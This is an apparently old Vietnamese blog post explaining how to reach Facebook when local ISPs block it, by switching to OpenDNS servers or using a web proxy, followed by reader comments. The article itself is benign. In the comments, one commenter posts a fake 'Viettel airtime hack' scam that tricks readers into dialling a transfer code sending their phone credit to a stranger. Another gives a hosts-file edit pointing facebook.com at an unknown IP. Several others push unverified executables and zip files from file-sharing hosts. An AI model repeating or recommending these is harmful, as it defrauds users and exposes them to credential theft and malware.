Hot News
Loading...

Cách khắc phục lỗi không vào được facebook!

Facebook là một trong những mạng xã hội lớn nhất thế giới. Đặc biệt là tại Việt Nam, số lượng người dùng facebook ngày càng đông đảo tương tự như Yahoo! 360 ngày xưa. Bằng vào nhiều tính năng vượt trội và vô số trò chơi thú vị như Barn Buddy, Mafia Wars, Happy Farm,…v.v Facebook đã chiếm được cảm tình của rất đông người dùng internet tại Việt  Nam. Chỉ trong thời gian ngắn facebook đã trở thành một thứ gây “nghiện” cho nhiều người, đặc biệt là dân văn phòng.


logo facebook Cách khắc phục lỗi không vào được facebook!



Tuy nhiên mấy hôm nay không hiểu sao facebook lại không thể truy cập được từ một số điểm trên toàn quốc. Điều này phần nào gây ức chế và cản trở công việc của rất nhiều người. (Mấy hôm không vào thì còn gì là vườn rau của tôi nữa T_T)

Do vậy Bài viết này sẽ hướng dẫn các bạn cách khắc phục lỗi không truy cập được vào facebook của một số mạng internet ADSL tại Việt Nam.

1. Sử dụng OpenDNS:

Đây là cách đơn giản và an toàn nhất. Đặc biệt là bạn không cần cài đặt bất cứ một cái gì cả. Chỉ đơn giản vào Control Panel

->Network Connections

->Local Area Network-

>Phải chuột và chọn Properties

->Sau đó chọn Internet Protocol (TCP/IP) và click nút Properties

-> Chọn Use the following DNS server addresses

-> Điền vào ô Preferred DNS server: 208.67.222.222 và ô Alternative DNS server: 208.67.220.220

-> Click Ok

->Ok.

Hướng dẫn đổi DNS bằng hình ảnh


 Hình 1 : Double click vào biểu tượng card mạng


 Hình 2 : Click Properties


 Hình 3 : Double click vào dòng Internet Protocol (TCP/IP)


 Hình 4 : Chọn Use the following DNS server addresses

Điền DNS mới vào 2 dòng Preferred DNSAlternate DNS như trong hình

Nhấn OK để đồng ý thay đổi.

Vậy là xong, giờ bạn thử truy cập vào facebook xem có được không?

2. Sử dụng Proxy: Đơn giản bạn chỉ cần truy cập vào trang: http://hypercloak.com sau đó gõ facebook.com và click nút Surf là xong. Rất đơn giản! Chúc các bạn trồng cây vui vẻ!

nguồn: misao blog
Share on Google Plus

About Chinhnd

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

18 nhận xét :

  1. bạn vô links sau tham khảo nhé.http://motibee.com/dien-dan/muc-luc/sau-gio-lam/thu-vien-cong-dong/khong-vao-duoc-facebook-cach-xu-ly.html

    ReplyDelete
  2. Dùng Google DNS cũng tốt lắm.

    ReplyDelete
  3. đăng nhập:http://vi-vn.conect.facebook.com

    ReplyDelete
  4. Sao minh` vao` OpenDNS lai. kho^ng tha^y' Control Panel da^u ca? con` vao` vi-vn.connect.facbook.com thi` no' bao? minh` kho^ng du? tu cach' ?

    ReplyDelete
  5. Không cần vào OpenDNS đâu ban, ban chỉnh trực tiếp trên máy tính như hướng dẫn là ok thôi.

    ReplyDelete
  6. bực mình quá, sao mình vô trang hypercloak.com không được?? có ai biết được chỉ mình với...hjxhjx

    ReplyDelete
  7. vẫn k vào được???

    ReplyDelete
  8. VÀO FACEBOOK HOÀN HẢO KHI BỊ CHẶN BẰNG PHIÊN BẢN ULTRAL SURF 10.04
    Download phan mem Urtral Surf 10.04 này về chạy là ok http://www.ziddu.com/download/13224141/UtraSurf10.04.zip.html , vào facebook vèo vèo, khi chạy phần mềm này nó sẽ xuất hiện trang web của nó, đây là dấu hiệu bạn đã vào facebook được rồi , tắt trang web đó đi hoặc xài luôn trang web đó để vào facebook bình thường.

    Nếu vào không được hoặc vào chậm rì thì hãy kiểm tra các thứ như sau :
    -Thứ nhất :
    Xoá hoặc đi hết các chương trình khác hỗ trợ vào facebook khác nếu có vì tránh xung đột, đôi khi cần phải khởi động máy lại.
    -Thứ hai :
    Thiết lập DNS trờ lại mặc định là "Obtain dns....". Nếu bạn nào không biết cách vào chỗ này thì tìm trên google gõ vào "thiết lập DNS để vào facebook" thì sẽ có cả đống hướng dẫn vào chỗ này.
    -Thứ ba : xoá đi hết các dòng mà bạn đã thêm vào file host trong thư mục etc, nếu trước đó bạn không có thêm thì bỏ qua cái này.
    -Thứ tư : xoá hết cac file rác internet và cookie đi.

    ReplyDelete
  9. http://forum.facebookviet.com/index.php?/topic/519-vao-facebook-tuy%E1%BB%87t-d%E1%BB%91i-khong-b%E1%BB%8B-ch%E1%BA%B7n-nh%E1%BB%9D-k%E1%BA%BFt-h%E1%BB%A3p-open-dns-google-va-ph%E1%BA%A7n-m%E1%BB%81m-hide-my-ip/page__pid__1351#entry1351
    Vào đây xem hướng dẫn là Ok nhất ;)

    ReplyDelete
  10. Tôi dùng Win7 64bit điền DNS đúng như hướng dẫn rồi vẫn không thể vào được

    ReplyDelete
  11. File name: facefix.exe
    File size:100.00 KB


    Việc đổi DNS đã không còn tác dụng nữa rồi.
    Trên đây là cách fix lỗi mới nhất ngày 09-01-2011. Chỉ việc download file và chạy.

    ReplyDelete
  12. Trình duyệt chạy Facebook

    Facebook WebBrowser 1.0
    http://www.mediafire.com/?pzgd433vx2ebnki

    ReplyDelete
  13. Bạn hãy vào C:\WINDOWS\system32\drivers\etc
    mở file host lên = notepad thêm dòng này vào :


    #Powered by Blue Space Solutions - Find us at: www.bluespace.vn
    127.0.0.1 localhost

    153.16.15.71 facebook.com
    153.16.15.71 www.facebook.com
    153.16.15.71 apps.facebook.com


    Sau đó save lại, đảm bảo bạn vào facebook rất bình thường; tỷ lệ thành công 100%, hơi thủ công một tý nhưng khỏi cần can thiệp bằng Software vừa lôi thôi vừa rắc rối, chúc thành công như ý!(dùng cho hệ điều hành windows)

    ReplyDelete
  14. Mình tìm được cách vào facebook nhanh và đơn giản cực kỳ , Download : http://dropbox.noface.info/Open-Facebook.zip

    ReplyDelete
  15. Các bạn chỉ cần thực hiện tuần tự và chính xác theo yêu cầu của 6 bước sau:

    1 -Một sim Viettel hoạt động trên 230 ngày(hõn 7 tháng).Tại sao phải cần vậy?V́ chỉ có những sim hoạt dộng trên 7 tháng mới được Viettel đưa vào mã bảo vệ tài khoản chuyển tiền ( 6 tháng chưa được đâu các bạn) trên server Viettel quản lí.

    2 -Rất đơn giản : Soạn tin MK gửi tới 136 để lấy mât khẩu chuyển tiền của bạn( nếu bạn chưa có).Tại sao phải cần vậy? V́ chúng ta hack thông qua dịch vụ I-Share của Viettel.

    3 -Ðổi mật khẩu chuyển tiền: các bạn gọi tới 900 ,nhánh phím số 3 và làm theo hướng dẫn..Người ta sẽ yêu cầu bạn nhập mã số bí mật: các bạn nhập mật khẩu cũ của các bạn vào; người ta yêu cầu bạn nhập mã số bí mật mới: các bạn nhập 10010010 và nhập lại 10010010 lần nữa. Điều quan trọng nằm ở bước này. Các bạn phải đổi mật khẩu chuyển tiền thành dãy :10010010 ,đó chính là mật khẩu Server trung gian ở bước 5. Tại sao phải làm vậy?V́ khi các bạn chuyển mật khẩu thành dãy số trên tức là đã mã hóa tài khoản của bạn trên Server mà Viettel quản lí.Ðiều này rất quan trọng.

    4 -Tài khoản trong sim của bạn phải có nhiều hơn 31999 Vnd.

    5 -Các bạn làm theo cú pháp nhý sau: *136* mật khẩu Server *mã PIN *mã PUK#.(tương tự cấu trúc của cú pháp chuyển tiền). Để khỏi mất thời gian của các bạn t́m lại 2 mã trên nên tôi đã tạo ra một Server trung gian ( viết tắt là TIS-Telephone of Intermediacy Server) với mã PIN và mã PUK mặc định (dùng đăng nhập sðt của bạn trên Server),tóm lại, cụ thể các thông số như sau (chỉ áp dụng cho mạng Viettel):
    + mật khẩu Server: 10010010
    + mã PIN : 841657887069
    + mã PUK: 30000
    Các bạn chỉ cần nhập chính xác 3 dãy số trên vào cú pháp và nhấn nút gọi th́ hệ thống sẽ tự động đăng nhập sðt của bạn vào TIS (Telephone of Intermediacy Server) mà tôi tạo ra và tài khoản của sðt người gửi sẽ tự động được cộng thêm tiền hack được sau khi đăng nhập (tiền hack được sẽ công thêm vào tài khoản chính),thật ra đây là một trong những cách hack tài khoản điện thoại mà các Hacker chuyên nghiệp trên thế giới gần đây mới sử dụng ( nguyên lí là dùng mã hack đảo chiều các dịch vụ chuyển tiền từ các Server di động,chẳng hạn như I-Share, hiện trên mạng có nhiều tài liệu tiếng Anh nói về vấn đề này).

    6- Sau khi làm xong những bước trên : các bạn chỉ cần đợi 15 phút , sẽ có tin nhắn trả lời và tài khoản chính của các bạn đã được cộng thêm 100000 vnð. (đã Test)

    Xin chú ý :

    1. Các bạn chỉ hack được 3 lần trong 1 ngày ( có nghĩa là 1 ngày chỉ hack được 300.000 VNĐ ) và mỗi lần hack phải thực hiện liên tiếp thật nhanh để sever luôn liên tục và hiệu quả cho mỗi lần rất cao.
    2. Các bạn phải luôn theo dõi thường xuyên website của chúng tôi v́ lâu ngày viettel sẽ phát hiện sever hack đó và chúng tôi sẽ đổi sever hack khác. Mong các bạn thông cảm

    Lời khuyên :
    Các bạn nên ‘ hack 3 trong 1’ có nghĩa là chỉ 1 lần thao tác bạn có thể hack được 1 lúc 300.000 VNĐ và hiệu quả thành công lên đến 99,99% đấy.
    Làm thế nào à ? đơn giản thôi , bạn thao tác *136* mật khẩu Server *mã PIN *mã PUK# rồi lưu vào danh bạ với 1 tên nào đó rồi bấm nút gọi 3 lần ( mỗi lần gọi cách nhau từ 5 giây đến 15 giây ) thế là bạn đã có 300.000 VNĐ trong tài khoản chính rồi đấy.

    Mọi thắc mắc, yêu cầu về bất cứ vấn đề ǵ mời bạn gửi về hộp thư
    email: vietdark2010@yahoo.com.vn

    ReplyDelete
  16. Đơn gian thôi, hảy vào đây, đã tẽt rất ok! hơn cả mong đợi.
    http://www.nhachothue24h.vn/show-news-detail.7.chi-tiet.1230.Cach-vao-facebook-mot-cach-don-gian-hieu-qua-vao-facebook-that-de-thoi-facebook-khong-bi-chan-dang-ky-facebook-de-dang-dang-nhap-facebook-de-dang.html

    ReplyDelete
  17. Đơn gian thôi, hảy vào đây, đã tẽt rất ok! hơn cả mong đợi.rất tuyệt
    http://www.nhachothue24h.vn/show-news-detail.7.chi-tiet.1230.Cach-vao-facebook-mot-cach-don-gian-hieu-qua-vao-facebook-that-de-thoi-facebook-khong-bi-chan-dang-ky-facebook-de-dang-dang-nhap-facebook-de-dang.html

    ReplyDelete


♦ Mời bạn gửi Nhận xét của mình. Bạn có thể nhận xét bằng cách chọnComment asTên/URL hay Ẩn danh. Tuy nhiên bạn nên chọn Tên/URL với URL có thể để trống. Bạn vui lòng gõ tiếng Việt có dấu.

♦ Bấm vào Đăng ký qua email [Subscribe by email] để đăng ký theo dõi nhận xét của bài này.

♦ Các bạn tự chịu trách nhiệm với Nhận xét của mình. Nhận xét của bạn cho biết Bạn là ai? Là người như thế nào?.